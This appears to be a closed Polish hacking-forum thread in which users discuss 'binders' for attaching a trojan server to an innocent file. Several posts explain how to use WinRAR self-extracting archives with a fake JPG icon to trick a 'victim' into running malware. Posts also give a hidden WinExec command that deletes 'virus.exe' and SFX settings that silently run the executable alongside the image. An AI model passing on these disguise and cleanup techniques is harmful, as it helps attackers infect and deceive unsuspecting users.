Bindery nie chcą działać!! -help

Status
Zamknięty.

F1a5h

Użytkownik
Dołączył
Wrzesień 14, 2004
Posty
11
Jak próbuję uruchomić jakiego kolwiek bindera to wyskakuje mi okienko - "System Windows nie może uzyskać dostepu do określonego urządzenia, ścieżki lub pliku. Możesz nie mieć odpowiednich uprawnień aby uzyskać dostęp do elementu." Dodam, że to Win XP i mam prawa Admina. Powiedzcie w czym może tkwić problem...
 

F1a5h

Użytkownik
Dołączył
Wrzesień 14, 2004
Posty
11
Ccobra:
a spróbuj zainstalować 98
To jest niestety raczej impossible. Mam NTFS na dysku, więc ani nawet dyskietki startowej sobie nie zrobię, a poza tym Win98 i tak tylko na TAT-cie przecieeż pójdzie....
 
Ostatnio edytowane przez moderatora:

saipix

Użytkownik
Dołączył
Sierpień 13, 2004
Posty
131
Boshe czy ja niewyraźnie mówie, czy co.....!?!?!?!?!
WinRar to jest binder.
Tylko nie mów że ci nie działa...! ! !
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
M@R(1N$:
Boshe czy ja niewyraźnie mówie, czy co.....!?!?!?!?!
WinRar to jest binder.
Tylko nie mów że ci nie działa...! ! !
Podpisuję się oboma ręcami
smile.gif
 
Ostatnio edytowane przez moderatora:

sonne

Użytkownik
Dołączył
Wrzesień 21, 2004
Posty
67
Originally posted by M@R(1N$
Boshe czy ja niewyraźnie mówie, czy co.....!?!?!?!?!
WinRar to jest binder.
Tylko nie mów że ci nie działa...! ! !

Bardzo krótkoterminowy binder... :-x
Nawet jesli sie wypakuje pliki gdzies gleboko, to i tak po drugim kliknieciu przez ofiare w np. sfx-a (z np. podmieniona ikona jpg-a) pojawia sie pytanie czy zamienic juz istniejace pliki.
Opcja usun po wypakowaniu nie dziala razem z opcja uruchom po wypakowaniu, co jest zrozumiale. Czyli trza ewentualnie dolaczyc jakiegos bata, czy cos.... ktory usunie plik serwera. Tyle, ze wtedy zbindowany z nim przykladowo jpg bedzie chcial sie i tak drugi raz wypakowywac, wiec tez trza go tez usunac... O ile wszystko dobrze pamietam ...
Jednym slowem sam w sobie wcale nie taka rewelacja... chyba, ze na wybitnego durnia, ale na takiego to byle jaki binder wystarczy :cry:
No ewentualnie mozna jeszcze dniem i noca siedziec przy kompie i wyczekiwac az ofiara uruchomi serwer, aby go za kazdym razem kasowac.
Bo jak sie usunie sfx-a czyli ten niby jpg to sie od razu pokapuje...
Ale nateoretyzowalam :ups: :| Lepiej juz koncze :x
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
Hehehe, no sam wiesz że trzeba pokombinować, ale tego nie zrobiłeś i narzekasz. WinRar jest best and only. Wystarczy zmontować też odpowiedni bat, przerobiony na exe, który na początku ma polecenia dotyczące kasowania plików o takich nazwach jak w archiwum. Więcej nie ma sensu mówić, rusz móżgownicą i sam na to wpadniesz.
 

sonne

Użytkownik
Dołączył
Wrzesień 21, 2004
Posty
67
Po pierwsze jestem rodzaju zenskiego, co widac w mojej wypowiedzi... no ale rozumiem, ze nie zuwazyles. :-D
Po drugie pisalam, ze trzeba dodac bata, wiec nie wiem czemu piszesz, ze nie pokombinowalam i narzekam... Cos mi sie wydaje, ze w ogole niedokladnie czytasz.
Mi chodzilo o to, ze WinRar sam w sobie nie jest rewelacja... No ale nie ma rzeczy idealnych. W sumie mozna by napisac, zeby sobie samemu stworzyc binder i po krzyku... ale co to ma wspolnego z Winrarem.
O moja mozgownice sie nie martw :?
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
No to po prostu źle pokombinowałAś albo za mało, bo ja Cię zapewniam, że można. I to tak dobrze, że w ogóle nie wiem po co komu inne "bindery".
 

saipix

Użytkownik
Dołączył
Sierpień 13, 2004
Posty
131
Kod:
WinExec("cmd.exe /c del virus.exe",SW_HIDE);

Boshe...co to za problem....kompilujesz se to w jakimś #c kompilatorze i doklejasz WinRar'em do pliku....! ! !
 

sonne

Użytkownik
Dołączył
Wrzesień 21, 2004
Posty
67
Dżizes :? Czy ja piszę po rusku, czy co ?
Przecież wiem, że jest fura kombinacji i można by tu pisac do rana. Ja przecież wyraźnie zaznaczyłam, że SAM WinRar nie wystarczy i tyle... a to już oznacza, że nie jest taki super... Równie dobrze można pokombinowac bez WinRara...
Barca, gdzie ja napisałam, że nie wykombinowałam ?
 

saipix

Użytkownik
Dołączył
Sierpień 13, 2004
Posty
131
Opcja usun po wypakowaniu nie dziala razem z opcja uruchom po wypakowaniu, co jest zrozumiale.[/b]

Tak na marginesie......nie rozumiem twojej wypowiedzi....?
Czemu ci to nie działa i tym bardziej dlaczego to jest zrozumiałe....? ? ?
 

SZKOD[nick]

Były Moderator
Dołączył
Maj 2, 2003
Posty
808
Originally posted by M@R(1N$
<div class='quotetop'>CYTAT
Opcja usun po wypakowaniu nie dziala razem z opcja uruchom po wypakowaniu, co jest zrozumiale.

Tak na marginesie......nie rozumiem twojej wypowiedzi....?
Czemu ci to nie działa i tym bardziej dlaczego to jest zrozumiałe....? ? ?[/b][/quote]jest jest, nabije posta na logike :p:p
chodzi o to ze opcja 1 nie zadziala z opcja 2 bo opcja 1 usunie plik *.* ktory chciala wykorzystac opcja 2 i odwrotnie. czyli ze jak plik bedzie usuniety to i nie otworzy sie go a jak bedzie otwierany to nie bedzie mozna usunac bo bedzie uzywany... tak, o to chodzi? wiedzialam, my kobiety mamy to cos czego faceci nie maja (mowie o 8 marca)

PS wszystkiego najlepszego chlopcyki :* ueheh :D
 

sonne

Użytkownik
Dołączył
Wrzesień 21, 2004
Posty
67
Originally posted by M@R(1N$
Tak na marginesie......nie rozumiem twojej wypowiedzi....? Czemu ci to nie działa i tym bardziej dlaczego to jest zrozumiałe....? ? ?

Silent=1 (lub2)
Setup=xxx.exe
Setup=xxx.jpg
Delete=xxx.exe

W obu przypadkach plik .exe sie uruchamia i ok. Do skasowania potrzebna by byla opcja usun po uruchomieniu, a nie usun z folderu docelowego...
 
Status
Zamknięty.
Do góry Bottom